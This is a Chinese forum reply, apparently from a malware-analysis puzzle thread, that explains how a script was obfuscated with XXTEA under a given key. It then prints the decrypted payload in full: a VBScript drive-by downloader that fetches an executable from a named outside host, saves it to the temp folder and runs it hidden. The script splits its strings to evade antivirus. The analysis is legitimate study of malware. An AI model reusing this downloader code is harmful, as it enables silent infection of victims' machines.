sanhu35 发表于 2012-6-19 08:57 
建议答案用红色字体标明,让不会的也可以很清楚的学习下!
这里, 由最后的- t=utf8to16(xxtea_decrypt(base64decode(t),'1238kk'));
复制代码 知: 混淆方式为 xxtea, 密钥为 1238kk.
使用 Redoce 解密功能 P2>XXTEA解密 (需外{过}{滤}挂插件)
将前面 base64 的内容填在 "处理前", 填写密钥后 Decode (+Base64) 得到 "明文":- <script language="VBScript">
- on error resume next
- justurl = "http://jingliu.3322.org/smss.exe"
- eeeeee="cls"+"i"+"d:B"+""+""+"D96"
- gameeeeee="obj"+"ect"
- easl="C556-65A3-"
- just2="classid"
- wertxxx=eeeeee & easl &"11D0-983A-00C04FC29E36"
- just3="Micr"+"osoft.XMLHTTP"
- just4="Shell.App"+"lication"
- just5="Scrip"+"ting.File"+"SystemObject"
- Set rootealsi = document.createElement(gameeeeee)
- sub usicecod(just4,rootjust)
- set justendif = rootealsi.createobject(just4,"")
- justendif.ShellExEcutE rootkit,"","","open",0
- end sub
- rootealsi.setAttribute just2, wertxxx
- chilam=just3
- Set xiaozi = rootealsi.CreateObject(chilam,"")
- User="andhi"
- justxxxx="eam"
- justxxx="Str"
- justxx="Adodb."
- queryeset = justxx & justxxx & justxxxx
- fuckavast = queryeset
- set justav360 = rootealsi.createobject(fuckavast,"")
- justav360.type = 1
- fuckavavav="GET"
- xiaozi.Open fuckavavav, justurl, False
- xiaozi.Send
- rootkit="justju.sCr"
- SeT shaduav = rootealsi.createobject(just5,"")
- sET justendif = shaduav.GetSpecialFolder(2)
- justav360.open
- rootkit= shaduav.BuildPath(justendif,rootkit)
- justav360.write xiaozi.responseBody
- justav360.savetofile rootkit,2
- justav360.close
- call usicecod(just4,rootjust)
- </script>
复制代码 ^_^ |